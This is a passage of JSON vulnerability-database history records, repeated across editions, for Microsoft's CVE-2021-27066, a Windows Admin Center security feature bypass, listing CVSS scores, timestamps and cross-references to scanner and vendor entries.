"integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27066", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2021-27066"], "immutableFields": [], "lastseen": "2021-09-17T16:49:26", "history": [], "viewCount": 7, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-27066"]}, {"type": "nessus", "idList": ["WINDOWS_ADMIN_CENTER_MS21_MAR.NASL"]}, {"type": "kaspersky", "idList": ["KLA12111"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:88A83067D8D3C5AEBAF1B793818EEE53"]}], "modified": "2021-09-16T12:43:00", "rev": 2}, "score": {"value": 5.8, "vector": "NONE", "modified": "2021-09-16T12:43:00", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBRelease Notes"], "msrc": "", "mscve": "CVE-2021-27066", "msAffectedSoftware": [{"name": "Windows Admin Center", "kbSupersedence": "", "kb": "KBRelease Notes", "msplatform": ""}, {"name": "Windows Admin Center", "kbSupersedence": "", "kb": "KBRelease Notes", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-17T16:49:26", "differentElements": ["msAffectedSoftware"], "edition": 68}, {"bulletin": {"id": "MS:CVE-2021-27066", "hash": "3c029ffeade3d3a98dc989d14961ebb1", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows Admin Center Security Feature Bypass Vulnerability", "description": "Windows Admin Center Security Feature Bypass Vulnerability \n", "published": "2021-03-09T08:00:00", "modified": "2021-03-09T08:00:00", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27066", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2021-27066"], "immutableFields": [], "lastseen": "2021-09-17T18:42:38", "history": [], "viewCount": 7, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-27066"]}, {"type": "nessus", "idList": ["WINDOWS_ADMIN_CENTER_MS21_MAR.NASL"]}, {"type": "kaspersky", "idList": ["KLA12111"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:88A83067D8D3C5AEBAF1B793818EEE53"]}], "modified": "2021-09-16T12:43:00", "rev": 2}, "score": {"value": 5.8, "vector": "NONE", "modified": "2021-09-16T12:43:00", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBRelease Notes"], "msrc": "", "mscve": "CVE-2021-27066", "msAffectedSoftware": [{"name": "Windows Admin Center", "kbSupersedence": "", "kb": "KBRelease Notes", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-17T18:42:38", "differentElements": ["msAffectedSoftware"], "edition": 69}, {"bulletin": {"id": "MS:CVE-2021-27066", "hash": "3658a9de69169c8131cdc7d2cd2a9cfb", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows Admin Center Security Feature Bypass Vulnerability", "description": "Windows Admin Center Security Feature Bypass Vulnerability \n", "published": "2021-03-09T08:00:00", "modified": "2021-03-09T08:00:00", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27066", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2021-27066"], "immutableFields": [], "lastseen": "2021-09-17T20:53:54", "history": [], "viewCount": 7, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-27066"]}, {"type": "nessus", "idList": ["WINDOWS_ADMIN_CENTER_MS21_MAR.NASL"]}, {"type": "kaspersky", "idList": ["KLA12111"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:88A83067D8D3C5AEBAF1B793818EEE53"]}], "modified": "2021-09-16T12:43:00", "rev": 2}, "score": {"value": 5.8, "vector": "NONE", "modified": "2021-09-16T12:43:00", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBRelease Notes"], "msrc": "", "mscve": "CVE-2021-27066", "msAffectedSoftware": [{"name": "Windows Admin Center", "kbSupersedence": "", "kb": "KBRelease Notes", "msplatform": ""}, {"name": "Windows Admin Center", "kbSupersedence": "", "kb": "KBRelease Notes", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-17T20:53:54", "differentElements": ["msAffectedSoftware"], "edition": 70}, {"bulletin": {"id": "MS:CVE-2021-27066", "hash": "3c029ffeade3d3a98dc989d14961ebb1", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows Admin Center Security Feature Bypass Vulnerability", "description": "Windows Admin Center Security Feature Bypass Vulnerability \n", "published": "2021-03-09T08:00:00", "modified": "2021-03-09T08:00:00", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27066", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2021-27066"], "immutableFields": [], "lastseen": "2021-09-17T22:46:49", "history": [], "viewCount": 7, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-27066"]}, {"type": "nessus", "idList": ["WINDOWS_ADMIN_CENTER_MS21_MAR.NASL"]}, {"type": "kaspersky", "idList": ["KLA12111"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:88A83067D8D3C5AEBAF1B793818EEE53"]}], "modified": "2021-09-16T12:43:00", "rev": 2}, "score": {"value": 5.8, "vector": "NONE", "modified": "2021-09-16T12:43:00", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBRelease Notes"], "msrc": "", "mscve": "CVE-2021-27066", "msAffectedSoftware": [{"name": "Windows Admin Center", "kbSupersedence": "", "kb": "KBRelease Notes", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-17T22:46:49", "differentElements": ["msAffectedSoftware"], "edition": 71}, {"bulletin": {"id": "MS:CVE-2021-27066", "hash": "3658a9de69169c8131cdc7d2cd2a9cfb", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows Admin Center Security Feature Bypass Vulnerability", "description": "Windows Admin Center Security Feature Bypass Vulnerability \n", "published": "2021-03-09T08:00:00", "modified": "2021-03-09T08:00:00", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27066", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2021-27066"], "immutableFields": [], "lastseen": "2021-09-18T00:48:35", "history": [], "viewCount": 7, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-27066"]}, {"type": "nessus", "idList": ["WINDOWS_ADMIN_CENTER_MS21_MAR.NASL"]}, {"type": "kaspersky", "idList": ["KLA12111"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:88A83067D8D3C5AEBAF1B793818EEE53"]}], "modified": "2021-09-16T12:43:00", "rev": 2}, "score": {"value": 5.8, "vector": "NONE", "modified": "2021-09-16T12:43:00", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBRelease Notes"], "msrc": "", "mscve": "CVE-2021-27066", "msAffectedSoftware": [{"name": "Windows Admin Center", "kbSupersedence": "", "kb": "KBRelease Notes", "msplatform": ""}, {"name": "Windows Admin Center", "kbSupersedence": "", "kb": "KBRelease Notes", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-18T00:48:35", "differentElements": ["msAffectedSoftware"], "edition": 72}, {"bulletin": {"id": "MS:CVE-2021-27066", "hash": "3c029ffeade3d3a98dc989d14961ebb1", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows Admin Center Security Feature Bypass Vulnerability", "description": "Windows Admin Center Security Feature Bypass Vulnerability \n", "published": "2021-03-09T08:00:00", "modified": "2021-03-09T08:00:00", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27066", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2021-27066"], "immutableFields": [], "lastseen": "2021-09-18T02:46:36", "history": [], "viewCount": 7, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-27066"]}, {"type": "nessus", "idList": ["WINDOWS_ADMIN_CENTER_MS21_MAR.NASL"]}, {"type": "kaspersky", "idList": ["KLA12111"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:88A83067D8D3C5AEBAF1B793818EEE53"]}], "modified": "2021-09-18T02:46:36", "rev": 2}, "score": {"value": 5.8, "vector": "NONE", "modified": "2021-09-18T02:46:36", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBRelease Notes"], "msrc": "", "mscve": "CVE-2021-27066", "msAffectedSoftware": [{"name": "Windows Admin Center", "kbSupersedence": "", "kb": "KBRelease Notes", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-18T02:46:36", "differentElements": ["msAffectedSoftware"], "edition": 73}, {"bulletin": {"id": "MS:CVE-2021-27066", "hash": "3658a9de69169c8131cdc7d2cd2a9cfb", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows Admin Center Security Feature Bypass Vulnerability", "description": "Windows Admin Center Security Feature Bypass Vulnerability \n", "published": "2021-03-09T08:00:00", "modified": "2021-03-09T08:00:00", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27066", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2021-27066"], "immutableFields": [], "lastseen": "2021-09-18T18:43:36", "history": [], "viewCount": 7, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-27066"]}, {"type": "nessus", "idList": ["WINDOWS_ADMIN_CENTER_MS21_MAR.NASL"]}, {"type": "kaspersky", "idList": ["KLA12111"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:88A83067D8D3C5AEBAF1B793818EEE53"]}], "modified": "2021-09-18T18:43:36", "rev": 2}, "score": {"value": 5.8, "vector": "NONE", "modified": "2021-09-18T18:43:36", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBRelease Notes"], "msrc": "", "mscve": "CVE-2021-27066", "msAffectedSoftware": [{"name": "Windows Admin Center", "kbSupersedence": "", "kb": "KBRelease Notes", "msplatform": ""}, {"name": "Windows Admin Center", "kbSupersedence": "", "kb": "KBRelease Notes", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-18T18:43:36", "differentElements": ["msAffectedSoftware"], "edition": 74}, {"bulletin": {"id": "MS:CVE-2021-27066", "hash": "3c029ffeade3d3a98dc989d14961ebb1", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows Admin Center Security Feature Bypass Vulnerability", "description": "Windows Admin Center Security Feature Bypass Vulnerability \n", "published": "2021-03-09T08:00:00", "modified": "2021-03-09T08:00:00", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27066", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2021-27066"], "immutableFields": [], "lastseen": "2021-09-19T00:57:15", "history": [], "viewCount": 7, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-27066"]}, {"type": "nessus", "idList": ["WINDOWS_ADMIN_CENTER_MS21_MAR.NASL"]}, {"type": "kaspersky", "idList": ["KLA12111"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:88A83067D8D3C5AEBAF1B793818EEE53"]}], "modified": "2021-09-19T00:57:15", "rev": 2}, "score": {"value": 5.8, "vector": "NONE", "modified": "2021-09-19T00:57:15", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBRelease Notes"], "msrc": "", "mscve": "CVE-2021-27066", "msAffectedSoftware": [{"name": "Windows Admin Center", "kbSupersedence": "", "kb": "KBRelease Notes", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-19T00:57:15", "differentElements": ["msAffectedSoftware"], "edition": 75}, {"bulletin": {"id": "MS:CVE-2021-27066", "hash": "3658a9de69169c8131cdc7d2cd2a9cfb", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows Admin Center Security Feature Bypass Vulnerability", "description": "Windows Admin Center Security Feature Bypass Vulnerability \n", "published": "2021-03-09T08:00:00", "modified": "2021-03-09T08:00:00", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27066", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2021-27066"], "immutableFields": [], "lastseen": "2021-09-19T08:47:56", "history": [], "viewCount": 7, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-27066"]}, {"type": "nessus", "idList": ["WINDOWS_ADMIN_CENTER_MS21_MAR.NASL"]}, {"type": "kaspersky", "idList": ["KLA12111"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:88A83067D8D3C5AEBAF1B793818EEE53"]}], "modified": "2021-09-19T08:47:56", "rev": 2}, "score": {"value": 5.8, "vector": "NONE", "modified": "2021-09-19T08:47:56", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBRelease Notes"], "msrc": "", "mscve": "CVE-2021-27066", "msAffectedSoftware": [{"name": "Windows Admin Center", "kbSupersedence": "", "kb": "KBRelease Notes", "msplatform": ""}, {"name": "Windows Admin Center", "kbSupersedence": "", "kb": "KBRelease Notes", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-19T08:47:56", "differentElements": ["msAffectedSoftware"], "edition": 76}, {"bulletin": {"id": "MS:CVE-2021-27066", "hash": "3c029ffeade3d3a98dc989d14961ebb1", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows Admin Center Security Feature Bypass Vulnerability", "description": "Windows Admin Center Security Feature Bypass Vulnerability \n", "published": "2021-03-09T08:00:00", "modified": "2021-03-09T08:00:00", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27066", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2021-27066"], "immutableFields": [], "lastseen": "2021-09-19T10:48:58", "history": [], "viewCount": 7, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-27066"]}, {"type": "nessus", "idList": ["WINDOWS_ADMIN_CENTER_MS21_MAR.NASL"]}, {"type": "kaspersky", "idList": ["KLA12111"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:88A83067D8D3C5AEBAF1B793818EEE53"]}], "modified": "2021-09-19T10:48:58", "rev": 2}, "score": {"value": 5.8, "vector": "NONE", "modified": "2021-09-19T10:48:58", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBRelease Notes"], "msrc": "", "mscve": "CVE-2021-27066", "msAffectedSoftware": [{"name": "Windows Admin Center", "kbSupersedence": "", "kb": "KBRelease Notes", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-19T10:48:58", "differentElements": ["msAffectedSoftware"], "edition": 77}, {"bulletin": {"id": "MS:CVE-2021-27066", "hash": "7d75ff58c8e8112121b7aec12131868c", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows Admin Center Security Feature Bypass Vulnerability", "description": "Windows Admin Center Security Feature Bypass Vulnerability \n", "published": "2021-03-09T08:00:00", "modified": "2021-03-09T08:00:00", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27066", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2021-27066"], "immutableFields": [], "lastseen": "2021-09-19T14:48:13", "history": [], "viewCount": 7, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-27066"]}, {"type": "nessus", "idList": ["WINDOWS_ADMIN_CENTER_MS21_MAR.NASL"]}, {"type": "kaspersky", "idList": ["KLA12111"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:88A83067D8D3C5AEBAF1B793818EEE53"]}], "modified": "2021-09-19T14:48:13", "rev": 2}, "score": {"value": 5.8, "vector": "NONE", "modified": "2021-09-19T14:48:13", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBRelease Notes"], "msrc": "", "mscve": "CVE-2021-27066", "msAffectedSoftware": [{"name": "Windows Admin Center", "kbSupersedence": "", "kb": "KBRelease Notes", "msplatform": ""}, {"name": "Windows Admin Center", "kbSupersedence": "", "kb": "KBRelease Notes", "msplatform": ""}, {"name": "Windows Admin Center", "kbSupersedence": "", "kb": "KBRelease Notes", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-19T14:48:13", "differentElements": ["msAffectedSoftware"], "edition": 78}, {"bulletin": {"id": "MS:CVE-2021-27066", "hash": "3c029ffeade3d3a98dc989d14961ebb1", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows Admin Center Security Feature Bypass Vulnerability", "description": "Windows Admin Center Security Feature Bypass Vulnerability \n", "published": "2021-03-09T08:00:00", "modified": "2021-03-09T08:00:00", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27066", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2021-27066"], "immutableFields": [], "lastseen": "2021-09-19T16:50:38", "history": [], "viewCount": 7, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-27066"]}, {"type": "nessus", "idList": ["WINDOWS_ADMIN_CENTER_MS21_MAR.NASL"]}, {"type": "kaspersky", "idList": ["KLA12111"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:88A83067D8D3C5AEBAF1B793818EEE53"]}], "modified": "2021-09-19T14:48:13", "rev": 2}, "score": {"value": 5.8, "vector": "NONE", "modified": "2021-09-19T14:48:13", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBRelease Notes"], "msrc": "", "mscve": "CVE-2021-27066", "msAffectedSoftware": [{"name": "Windows Admin Center", "kbSupersedence": "", "kb": "KBRelease Notes", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-19T16:50:38", "differentElements": ["msAffectedSoftware"], "edition": 79}, {"bulletin": {"id": "MS:CVE-2021-27066", "hash": "3658a9de69169c8131cdc7d2cd2a9cfb", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows Admin Center Security Feature Bypass Vulnerability", "description": "Windows Admin Center Security Feature Bypass Vulnerability \n", "published": "2021-03-09T08:00:00", "modified": "2021-03-09T08:00:00", 